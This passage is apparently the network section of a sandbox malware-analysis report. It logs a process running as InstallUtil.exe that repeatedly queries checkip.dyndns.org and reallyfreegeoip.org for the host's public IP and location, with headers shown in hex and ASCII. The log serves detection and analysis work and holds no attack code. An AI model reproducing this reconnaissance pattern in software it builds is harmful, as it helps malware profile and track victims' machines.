Dec 20, 2024 10:22:41.122796059 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bff6ea38cc7e11f9f5c1fd3707bedd0c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	132.226.247.73	80	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:42.918978930 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 20, 2024 10:22:44.222405910 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d6a724a5502db5354e497f8fb28152a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	132.226.247.73	80	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:46.403323889 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 20, 2024 10:22:47.707815886 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f6d95f93f8e1b397cd7ebc7f39a349b7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	132.226.247.73	80	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:49.499505997 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 20, 2024 10:22:50.804502010 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b317188686e4bb98dbea97ab3d28e7b4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	132.226.247.73	80	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:52.596546888 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 20, 2024 10:22:53.901072025 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 027b55237ef9f49dcc0bbbbf23e81083 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	132.226.247.73	80	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:55.768239021 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 20, 2024 10:22:57.092056990 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 172a43d101a5d077e1f47a529c0a772d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	132.226.247.73	80	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 10:22:58.880534887 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 20, 2024 10:23:00.183773041 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 985c6296e90ad8502cf33babff3ab8ad Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:22:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-20 09:22:40 UTC	854	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1349 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kU0F5Dt%2BbUelcgleEgj6K6efLESGAwbOaij8NVP0Hg%2FZel1Yli9J51QyB0gI8pI4hVZRwjm6lHf1oTXJDOkLaS5pU0kp%2FcUxNJFIh3YoACg%2BvNRQho6eFSzQZN7ikL9CQobQ8Apa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e91bafacb8c65-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2010&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1427174&cwnd=204&unsent_bytes=0&cid=4cf7e412872b5dd3&ts=455&x=0"
2024-12-20 09:22:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:22:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-20 09:22:42 UTC	854	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1351 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGqVHOU5tL2%2F3sOMj%2FeGqrwnzFUXxqy5T3ZpneTH2Iimw9ontQrEJD%2FX28PeSuR77FP8HBvOqEdrZP1biUZkNbNshzDSy9WO5fd3w5FYDcFHb0PH8z50%2F4gFeIelnHy4CkELSTtN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e91c859294262-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1593&rtt_var=605&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1799137&cwnd=190&unsent_bytes=0&cid=10906f384769b08e&ts=453&x=0"
2024-12-20 09:22:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:22:45 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-20 09:22:46 UTC	852	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:46 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1355 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AstRoLykTjLLx5AVQn8u2E9F10MSYrGLzX%2FVnz2rxr3CuqrOTDD3U0q4QoEczN342%2B9SveYZ7KTxn9OuVkaWH6mHgezrAO56wF4K%2FWITm66chQ2CSqfBAyEuAgHvtdA86F5QLnU5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e91de2e0dc445-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1470&rtt_var=567&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1902280&cwnd=227&unsent_bytes=0&cid=118ccaa21aa39735&ts=839&x=0"
2024-12-20 09:22:46 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:22:48 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-20 09:22:49 UTC	848	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:49 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1358 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XhJ64ksZAcfT4kxPwY9Z2K2a8Dz2eWqQ0rhTRRVbvdlyCkSEx9vu0xwB2OXfwZ8n71B0iO18zbdW9h4DkDem1huSgIcnLvC1ithXaRFoYnw2xBspn4cFghW1LqM0Sge5SKxxR%2FKI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e91f18b518c1d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1978&rtt_var=749&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1454183&cwnd=174&unsent_bytes=0&cid=e695cd8ee936f46d&ts=455&x=0"
2024-12-20 09:22:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:22:52 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-20 09:22:52 UTC	852	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1361 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wqie4zUxfpY9dGsfZ97ZgTJYfHADy0KSA%2FZ2vtu%2BI3X1IwrfkfSPXVST2yGs6zBp37NVvI9WrjNWG2849Ht0ybAwo4r9V84WfrFsSBV27pXvCI%2BPlCb7joSJTsYgWcAmPoE3WZ0s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e9204ee1b426b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1555&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1791411&cwnd=232&unsent_bytes=0&cid=0fc21902e56d5f75&ts=452&x=0"
2024-12-20 09:22:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:22:55 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-20 09:22:55 UTC	854	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1364 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omo1KXq7Mb7OtmfyIZ9ZvkldnZW4WeBC%2Fv3CXK0Du6GjewGPOd%2FIK6fpwuNZ47te%2B42U0OXanFjU0IcT4VWnJFNov4a5v7Zw%2FVQrQAiSf6ogcmWDmKHBtojvR5RJvHQt5h8KrVSi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e92183d4b6a5e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2496&min_rtt=2485&rtt_var=954&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1134421&cwnd=186&unsent_bytes=0&cid=ec6ecb472d9e6be1&ts=459&x=0"
2024-12-20 09:22:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	104.21.67.152	443	1432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-20 09:22:58 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-20 09:22:58 UTC	852	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 09:22:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1367 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9MwJ81m0gNMpWQEJpxBYkEyBEE%2FO1etFkBHjlCtw%2F%2FwbaH7OrUFfMskw09a1MbcTjGdxwVIwJUjzBHMtCWKsOYn8ofTl2coctwKnyV3SWn1arARFds0RNVajtbvxlY2UWNy93qY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4e922c29ab41bd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1610&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1813664&cwnd=248&unsent_bytes=0&cid=0996d2eee3ff1148&ts=454&x=0"
